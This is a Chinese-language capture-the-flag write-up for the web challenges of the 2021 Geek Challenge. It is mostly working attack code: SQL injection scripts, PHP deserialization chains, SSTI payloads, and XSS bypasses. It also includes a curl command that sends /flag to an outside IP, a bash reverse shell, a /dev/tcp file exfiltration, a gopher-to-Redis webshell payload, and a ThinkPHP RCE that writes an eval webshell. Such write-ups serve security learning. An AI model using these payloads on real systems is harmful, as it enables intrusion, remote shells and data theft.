2021极客大挑战web部分wp
2024-05-10 02:22:51
Dark
看到url:http://c6h35nlkeoew5vzcpsacsidbip2ezotsnj6sywn7znkdtrbsqkexa7yd.onion/
发现后缀为.onion,为洋葱,下载后使用洋葱游览器访问
Welcome2021
查看源码发现
那么抓包使用WELCOME请求方式访问
访问f1111aaaggg9.php
得到flag
babysql
简单的sql注入,直接使用sqlmap即可,也可以联合注入
1' union select 1,2,3,4#
发现注入点为1,2
直接获取数据库
-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3,4#
发现数据库flag,那么读取一下表
-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='flag'),3,4#
得到表fllag,那么读一下列
-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='flag' and table_name='fllag'),3,4#
最后读取即可:
-1' union select 1,(select group_concat(fllllllag,wlz) from flag.fllag),3,4#
anothersql
发现回显都是
很明显的布尔盲注,过滤了:
mid,substr 可以用left或right绕过
<,> 用=
if 用case when绕过
然后写出脚本,得到flag
import requests
import stringurl = "http://47.100.242.70:4003/check.php"flag = ''
string= '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,@{}'
for x in range(1, 100):for i in string:#true#payload = "1' or case when (left((database()),%d)='%s') then 1 else 0 end#" % (x, flag + i)#syclover#payload = "1' or case when (left((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d)='%s') then 1 else 0 end#" % (x, flag + i)#id,uname,pwd,flag#payload = "1' or case when (left((select group_concat(column_name) from information_schema.columns where table_name='syclover'),%d)='%s') then 1 else 0 end#" % (x, flag + i)payload = "1' or case when (left((select flag from syclover),%d)='%s') then 1 else 0 end#" % (x, flag + i)data = {'uname':payload,'pwd':'123456','wp-submit':'登录'}#print(payload)response = requests.post(url, data=data)if b'your uname:admin adn your pwd:123456' in response.content:flag += iprint(flag)break
babyPOP
简单的pop链,给出来源码
<?php
class a {public static $Do_u_like_JiaRan = false;public static $Do_u_like_AFKL = false;
}class b {private $i_want_2_listen_2_MaoZhongDu;public function __toString(){if (a::$Do_u_like_AFKL) {return exec($this->i_want_2_listen_2_MaoZhongDu);} else {throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");}}
}class c {public function __wakeup(){a::$Do_u_like_JiaRan = true;}
}class d {public function __invoke(){a::$Do_u_like_AFKL = true;return "关注嘉然," . $this->value;}
}class e {public function __destruct(){if (a::$Do_u_like_JiaRan) {($this->afkl)();} else {throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");}}
}if (isset($_GET['data'])) {unserialize(base64_decode($_GET['data']));
} else {highlight_file(__FILE__);
}
发现最后调用到类b的exec,那么就需要调用__toString()->需要返回一个字符串,看到类d,发现__invoke->需要使用调用函数的方式调用一个对象,看到类e,那么就需要将Do_u_like_AFKL变为true->调用类c
但从类c到类e的过程中没有桥梁,我们需要自定义一个变量来完成,然后将这个变量的对象指向类e
<?php
class a {public static $Do_u_like_JiaRan = false;public static $Do_u_like_AFKL = false;
}class b {private $i_want_2_listen_2_MaoZhongDu = 'curl 110.42.134.160:6666/`cat /flag|base64`';public function __toString(){if (a::$Do_u_like_AFKL) {return exec($this->i_want_2_listen_2_MaoZhongDu);} else {throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");}}
}class c {public $a;public function __construct(){$this->a = new e();}public function __wakeup(){a::$Do_u_like_JiaRan = true;}
}class d {public function __invoke(){a::$Do_u_like_AFKL = true;return "关注嘉然," . $this->value;}
}class e {public function __destruct(){if (a::$Do_u_like_JiaRan) {($this->afkl)();} else {throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");}}
}$n = new c();
$n->a->afkl = new d();
$n->a->afkl->value = new b();
$m = serialize($n);
var_dump($m);
echo(base64_encode($m));
由于exec没有回显,又不存在权限创建文件,需要我们使用dnslog外带命令了:
curl 110.42.134.160:6666/`cat /flag|base64`
解码得到flag
where_is_my_FUMO
给出了文章:Linux 反弹shell(二)反弹shell的本质
给出了源码:
<?php
function chijou_kega_no_junnka($str) {$black_list = [">", ";", "|", "{", "}", "/", " "];return str_replace($black_list, "", $str);
}if (isset($_GET['DATA'])) {$data = $_GET['DATA'];$addr = chijou_kega_no_junnka($data['ADDR']);$port = chijou_kega_no_junnka($data['PORT']);exec("bash -c \"bash -i < /dev/tcp/$addr/$port\"");
} else {highlight_file(__FILE__);
}
一开始尝试绕过,无果,后来测试了好久才发现可以连上去之后反弹shell,属实sb了
然后监听端口,反弹shell
bash -i >& /dev/tcp/110.42.134.160/2333 0>&1
最后需要下载flag.png到服务器,这里就需要文章中的内容了
cat flag.png > /dev/tcp/110.42.134.160/6666
然后监听端口输出到文件中,nc -lvnp 6666 > flag.png
得到flag
babyphp
右键查看源码得到提示robots.txt
访问得到源码:
<?php
function ssrf_me($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);curl_close($ch);echo $output;
}if(isset($_GET['url'])){ssrf_me($_GET['url']);
}
else{highlight_file(__FILE__);echo "<!-- 有没有一种可能,flag在根目录 -->";
}
简单的ssrf,直接file:///flag
babyPy
提示是flask ssti,那直接掏出payload
#文件读取
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/flag','r').read() }}{% endif %}{% endfor %}
#命令执行
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}
蜜雪冰城甜蜜蜜
发现需要点出第九号饮料,并且看到js
/** 生成签名* @params 待签名的json数据* @secret 密钥字符串*/
function makeSign(params, secret){var ksort = Object.keys(params).sort();var str = '';for(var ki in ksort){ str += ksort[ki] + '=' + params[ksort[ki]] + '&'; }str += 'secret=' + secret;var token = hex_md5(str).toUpperCase();return rsa_sign(token);
}/** rsa加密token*/
function rsa_sign(token){var pubkey='-----BEGIN PUBLIC KEY-----';pubkey+='MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDAbfx4VggVVpcfCjzQ+nEiJ2DL';pubkey+='nRg3e2QdDf/m/qMvtqXi4xhwvbpHfaX46CzQznU8l9NJtF28pTSZSKnE/791MJfV';pubkey+='nucVcJcxRAEcpPprb8X3hfdxKEEYjOPAuVseewmO5cM+x7zi9FWbZ89uOp5sxjMn';pubkey+='lVjDaIczKTRx+7vn2wIDAQAB';pubkey+='-----END PUBLIC KEY-----';// 利用公钥加密var encrypt = new JSEncrypt();encrypt.setPublicKey(pubkey);return encrypt.encrypt(token);
}/** 获取时间戳*/
function get_time(){var d = new Date();var time = d.getTime()/1000;return parseInt(time);
}//secret密钥
var secret = 'e10adc3949ba59abbe56e057f20f883e';$("[href='#']").click(function(){var params = {};console.log(123);params.id = $(this).attr("id");params.timestamp = get_time();params.fake_flag= 'SYC{lingze_find_a_girlfriend}';params.sign = makeSign(params, secret);$.ajax({url : "http://106.55.154.252:8083/sign.php",data : params,type:'post',success:function(msg){$('#text').html(msg);alert(msg);},async:false});})
直接新命名一个id为9的即可,放入控制台运行即可
var flag = {};
flag.id = 9;
flag.timestamp = get_time();
flag.fake_flag= 'SYC{lingze_find_a_girlfriend}';
flag.sign = makeSign(flag, secret);$.ajax({url : "http://106.55.154.252:8083/sign.php",data : flag,type:'post',success:function(msg){$('#text').html(msg);alert(msg);},async:false});
雷克雅未克
需要修改XFF头为5.23.95.255,这里推荐一个工具
然后发现需要经纬度需要一样,在存储(cookie)那里加上x和y即可,64.963943,-19.02116
为jsfuck,最后控制台运行得到flag
人民艺术家
随便登录发现
那么使用他给的账号密码登录吧,发现请求头多了JWT
拿去解密发现为HS256加密
需要知道密钥,那么盲猜弱密码,使用c-jwt-cracker进行爆破
得到密钥1234,那么修改好数据重新访问
这里我使用postman进行访问,也可以抓包增加JWT头进行访问
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0aW1lIjoiMjAxOSIsIm5hbWUiOiJhZG1pbiJ9.WInN2vLaV6NMMsfu-6-foUOZ8trV9Ll2RsZ_gGd8Idk
访问得到flag
babyxss
<script>
function check(input){input = input.replace(/alert/,'');return '<script>console.log("'+input+'");</script>';}
</script>
发现存在过滤字符alert,会将字符置空,那么直接双写绕过,还有绕过技巧:
</script><script>alalertert(1)</script>
</script><svg/onload=setTimeout('ale'+'rt(1)',0)>
</script><script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
Baby_PHP_Black_Magic_Enlightenment
给出了源码:
<?php
echo "PHP is the best Language <br/>";
echo "Have you ever heard about PHP Black Magic<br/>";
error_reporting(0);
$temp = $_GET['password'];
is_numeric($temp)?die("no way"):NULL;
if($temp>9999){echo file_get_contents('./2.php');echo "How's that possible";
}
highlight_file(__FILE__);
//Art is long, but life is short. So I use PHP.
//I think It`s So useful that DiaoRen Said;
//why not they use their vps !!!
//BBTZ le jiarenmen
?>
发现判断is_numeric($temp)和$temp>9999,要是temp不是数字但是大于9999,很明显弱比较
?password=10000a
得到baby_magic.php,进入下一关
<?php
error_reporting(0);$flag=getenv('flag');
if (isset($_GET['user']) and isset($_GET['pass']))
{if ($_GET['user'] == $_GET['pass'])echo 'no no no no way for you to do so.';else if (sha1($_GET['user']) === sha1($_GET['pass']))die('G1ve u the flag'.$flag);elseecho 'not right';
}
elseecho 'Just g1ve it a try.';
highlight_file(__FILE__);
?>
很明显sha1的数组绕过,直接传入数组就可以了?user[]=1&pass[]=2
baby_revenge.php,进入下一关发现:
<?php
error_reporting(0);$flag=getenv('fllag');
if (isset($_GET['user']) and isset($_GET['pass']))
{if ($_GET['user'] == $_GET['pass'])echo 'no no no no way for you to do so.';else if(is_array($_GET['user']) || is_array($_GET['pass']))die('There is no way you can sneak me, young man!');else if (sha1($_GET['user']) === sha1($_GET['pass'])){echo "Hanzo:It is impossible only the tribe of Shimada can controle the dragon<br/>";die('Genji:We will see again Hanzo'.$flag.'<br/>');}elseecho 'Wrong!';
}elseecho 'Just G1ve it a try.';
highlight_file(__FILE__);
?>
过滤了数组,那么需要sha1碰撞了,正好有一篇文章:关于SHA1碰撞——比较两个binary的不同之处
?user=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
&pass=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
得到here_s_the_flag.php,最后一关
<?php
$flag=getenv('flllllllllag');
if(strstr("Longlone",$_GET['id'])) {echo("no no no!<br>");exit();
}$_GET['id'] = urldecode($_GET['id']);
if($_GET['id'] === "Longlone")
{echo "flag: $flag";
}
highlight_file(__FILE__);
?>
由于urldecode会解码一次,GET传参会解码一次,那么将Longloneurl编码两次就可以绕过了
?id=%254c%256f%256e%2567%256c%256f%256e%2565
givemeyourlove
手把手带你用 SSRF 打穿内网
访问发现,并且给出了一串数字123123
<?php
// I hear her lucky number is 123123
highlight_file(__FILE__);
$ch = curl_init();
$url=$_GET['url'];
if(preg_match("/^https|dict|file:/is",$url))
{echo 'NO NO HACKING!!';die();
}
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
?>
题目提示redis,那么肯定是ssrf打redis了,由于存在密码,使用gopher-redis-auth
由于是GET传参,将生成的payload url编码一次得到:
gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A2%250D%250A%25244%250D%250AAUTH%250D%250A%25246%250D%250A123123%250D%250A%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
传入发现成功写入shell,最后读取flag即可
SoEzUnser
<?phpclass fxxk{public $par0;public $par1;public $par2;public $par3;public $kelasi;public function __construct($par0,$par1,$par2,$par3){$this -> par0 = $par0;$this -> par1 = $par1;$this -> par2 = $par2;$this -> par3 = $par3;}public function newOne(){$this -> kelasi = new $this -> par0($this -> par1,$this -> par2);}public function wuhu(){echo('syclover !'.$this -> kelasi.' yyds');}public function qifei(){//$ser = serialize($this -> kelasi);//$unser = unserialize($ser);$this -> kelasi -> juts_a_function();}public function __destruct(){if(!empty($this -> par0) && (isset($this -> par1) || isset($this -> par2))){$this -> newOne();if($this -> par3 == 'unser'){$this -> qifei();}else{$this -> wuhu();}}}public function __wakeup(){@include_once($this -> par2.'hint.php');}
}
highlight_file(__FILE__);
$hack = $_GET['hack'];
unserialize($hack);
调用了之前学过的原生态一起出的一个题,参考文章:PHP 原生类的利用小结
首先先读取一下hint.php:
$a= new fxxk();
$a->par2 = 'php://filter/convert.base64-encode/resource=';
$b = serialize($a);
echo(urlencode($b));
使用GlobIterator类读取一下目录文件
$a= new fxxk();
$a->par0 = 'GlobIterator';
$a->par1 = 'glob://*';
$b = serialize($a);
echo(urlencode($b));
?hack=O%3A4%3A"fxxk"%3A5%3A{s%3A4%3A"par0"%3Bs%3A12%3A"GlobIterator"%3Bs%3A4%3A"par1"%3Bs%3A8%3A"glob%3A%2F%2F*"%3Bs%3A4%3A"par2"%3BN%3Bs%3A4%3A"par3"%3BN%3Bs%3A6%3A"kelasi"%3BN%3B}
得到目录aaaaaaaaaaafxadwagaefae
接着往下翻发现
$a= new fxxk();
$a->par0 = 'GlobIterator';
$a->par1 = 'glob://aaaaaaaaaaafxadwagaefae/*';
$b = serialize($a);
echo(urlencode($b));
?hack=O%3A4%3A"fxxk"%3A5%3A{s%3A4%3A"par0"%3Bs%3A12%3A"GlobIterator"%3Bs%3A4%3A"par1"%3Bs%3A32%3A"glob%3A%2F%2Faaaaaaaaaaafxadwagaefae%2F*"%3Bs%3A4%3A"par2"%3BN%3Bs%3A4%3A"par3"%3BN%3Bs%3A6%3A"kelasi"%3BN%3B}
非预期
那么需要使用SplFileObject读取了,这里可以使用php伪协议进行base64加密
$a= new fxxk();
$a->par0 = 'SplFileObject';
$a->par1 = 'php://filter/convert.base64-encode/resource=aaaaaaaaaaafxadwagaefae/UcantGuess.php';
$a->par2 = 'rb';
$b = serialize($a);
echo(urlencode($b));
O%3A4%3A"fxxk"%3A5%3A{s%3A4%3A"par0"%3Bs%3A13%3A"SplFileObject"%3Bs%3A4%3A"par1"%3Bs%3A82%3A"php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Daaaaaaaaaaafxadwagaefae%2FUcantGuess.php"%3Bs%3A4%3A"par2"%3Bs%3A2%3A"rb"%3Bs%3A4%3A"par3"%3BN%3Bs%3A6%3A"kelasi"%3BN%3B}
直接可以获取源码了,得到flag
这里其实是非预期解出来的,实际上需要使用SoapClient
预期
根据提示,需要post传参:message=iwantflag&url=vps,然后必须从内网的127.0.0.1发送,很明显使用ssrf
使用SoapClient类,然后触发__call,调用ssrf来让127.0.0.1发送请求包,最后vps接收flag
$a= new fxxk();
$target = 'http://127.0.0.1/unserbucket/aaaaaaaaaaafxadwagaefae/UcantGuess.php';
$post_data = 'message=iwantflag&url=http://110.42.134.160:8080';$a->par0 = 'SoapClient';
$a->par1 = null;$a->par2 = array('location' => $target,'user_agent'=>'bmth^^X-Forwarded-For:127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '. (string)strlen($post_data).'^^^^'.$post_data,'uri'=>'http://127.0.0.1');
$a->par3 = 'unser';
$b = serialize($a);
$b = str_replace('^^',"\r\n",$b);
echo(urlencode($b));
O%3A4%3A%22fxxk%22%3A5%3A%7Bs%3A4%3A%22par0%22%3Bs%3A10%3A%22SoapClient%22%3Bs%3A4%3A%22par1%22%3BN%3Bs%3A4%3A%22par2%22%3Ba%3A3%3A%7Bs%3A8%3A%22location%22%3Bs%3A67%3A%22http%3A%2F%2F127.0.0.1%2Funserbucket%2Faaaaaaaaaaafxadwagaefae%2FUcantGuess.php%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A152%3A%22bmth%0D%0AX-Forwarded-For%3A127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+48%0D%0A%0D%0Amessage%3Diwantflag%26url%3Dhttp%3A%2F%2F110.42.134.160%3A8080%22%3Bs%3A3%3A%22uri%22%3Bs%3A16%3A%22http%3A%2F%2F127.0.0.1%22%3B%7Ds%3A4%3A%22par3%22%3Bs%3A5%3A%22unser%22%3Bs%3A6%3A%22kelasi%22%3BN%3B%7D
成全
发现是thinkphp5,直接使用payload试一下:
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
发现存在disable_functions,过滤了所有的可执行命令的函数,尝试写文件发现当前目录无法写,尝试/tmp目录下
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=/tmp/shell.php&vars[1][]=<?php @eval($_POST[0]);?>
最后通过包含来连接蚁剑
?s=index/\think\Config/load&file=../../../../tmp/shell.php
得到flag
没做出来的题目
期末不挂科就算成功
查看源码发现一个debug.php,访问
发现是php伪协议,/debug.php?file=php://filter/convert.base64-encode/resource=debug.php,读取一下
debug.php:
<?phpecho "<h1>快去学习PHP伪协议</h1>";error_reporting(0);$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){echo "NO!!!";exit();}include($file); ?>
index.php:
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
curl_exec($ch);
curl_close($ch);
//你当前位于学校172.17.0.0/24网段下 其实还有台机子里面可以修改成绩 我偷偷告诉你password是123456,name是admin,//result必须要改成60 不然学校会查的!!!
?>
发现是ssrf,爆破一下,发现内网为http://172.17.0.7/
noobPHP
给出了www.zip,审计一下,看到AdminController.php:
我们要使roles中有ROLE_ADMIN,但注册的时候roles只是为ROLE_USER,那么就需要创建
看到UserController.php:
发现传入数组的代码过滤的不一样,肯定有问题,分析发现
array_unshift($get_roles, 'ROLE_USER');
那么我们传入?r[0]=ROLE_SUPERADMIN&r[1]=ROLE_ADMIN变为:
然后进行
unset($get_roles[$i]);
$get_roles=array_values($get_roles);
看到当i=1的时候会unset掉我们传入的ROLE_SUPERADMIN,然后被返回的数组将使用数值键,从0开始且以1递增,下一个就直接是i=2了,直接绕过了ROLE_ADMIN
接下来就是
if (preg_match("/[a-zA-Z]|\!|\@|\#|\%|\^|\&|\*|\:|\||\'\"|\`|\~|\\|\||\[|]/",$code)) {new Response('Wow,not this
2021极客大挑战web部分wp相关推荐
- 2020年极客大挑战WEB部分WP
WriteUP Welcome 题目地址: http://49.234.224.119:8000/ 题目描述: 欢迎来到极客大挑战! 访问题目链接,发现405报错. 百度了一下,发现是GET或者POS ...
- 2021 极客大挑战 web
前言 拖了老长时间没写wp了,这题写的真爽 Dark 给了一个url: http://c6h35nlkeoew5vzcpsacsidbip2ezotsnj6sywn7znkdtrbsqkexa7yd. ...
- 【reverse】2021 极客大挑战(部分)
[reverse]2021 极客大挑战(部分) 1.调试 0x1 什么?得安装linux虚拟机?像我这种直接用ubuntu系统的根本不虚! 0x2 尝试直接运行,未果 拖入ida中分析,先看main ...
- 【misc】2021 极客大挑战(部分)
[misc]2021 极客大挑战(部分) 1.今天有被破防吗? 0x1 最早上的一批题目,当时没什么思路.后来pwn神在群里提到了RGB,瞬间懂了! 参考链接: gaps拼图 0x2 下载附件得到一个 ...
- CTF Geek Challenge——第十一届极客大挑战Web Write Up
比赛时间:2020年10月17日早上9点 比赛时限:一个月 0x1 Welcome sha1绕过 Postman发送POST请求 sha1绕过 线索 Not Found But 这个Not Found ...
- 2021极客大挑战WP集合
WP来自齐鲁师范学院网络安全社团 关注公众号接收更多最新的安全讯息 文章目录 WEB Dark Welcome2021 babypy babyphp babypop where_is_my_FUMO ...
- [2021极客大挑战]部分wp
Where_is_my_FUMO 开局是给了一个反弹shell的命令执行 <?php function chijou_kega_no_junnka($str) {$black_list = [& ...
- 2020极客大挑战web部分复现
WEB 0x01.朋友的学妹 找回感觉了,仿佛大一的第一道web题,哭唧唧,工作室里没人陪我,一个人复现.ctrl+U查看源码,找到注释的flag,页面提示base64解密,解密即得flag SYC{ ...
- 极客大挑战2021-部分wp
DARK 看到后缀去搜然后洋葱浏览器下载打开即可. SYC{hav3_fUn_1n_darK} welcome2021 f12看到提示后,改为welcom的请求方式,直接curl -X 改请求方式. ...
最新文章
- SpringBoot: xxxx for method parameter type String is not present]
- 微软人物立方——效果还很漂亮的
- .NET Core开发的iNeuOS工业互联网平台,发布 iNeuDA 数据分析展示组件,快捷开发图形报表和数据大屏...
- 操作系统中的处理机调度调度_操作系统中的流程分类和调度
- 实例解析:MySQL性能瓶颈排查定位,实现毫秒级完成180秒的任务
- 复盘-对过去的事情做思维演练
- html阿里矢量图标库,分析Iconfont-阿里巴巴矢量常用图标库
- 怎么学习大数据,入门大数据要掌握哪些知识?
- js获取当前URL、域名、端口号等
- 上海内推 | 微软亚洲研究院(上海)AI-ML组招聘AI实习生
- 学而思python分几个level_学而思数学分几个等级
- VS 2019Xamarin开发Android App生成apk文件
- 计算机专业优势及就业前景,女生学习计算机专业的优势及就业前景
- 不同版本cuda对应的NVIDIA驱动版本
- 推断统计学 假设检验 分布
- 2023年“挑战杯”大学生课外学术科技作品竞赛有感
- 视频流编码格式(四字符码)对照表
- Creo服务器管理器配置文件,Creo配置文件Config介绍及设置方法 | 坐倚北风
- 【桌面美化】这下可以肆无忌惮的看小姐姐了
- 2021绝地求生dm雷达
热门文章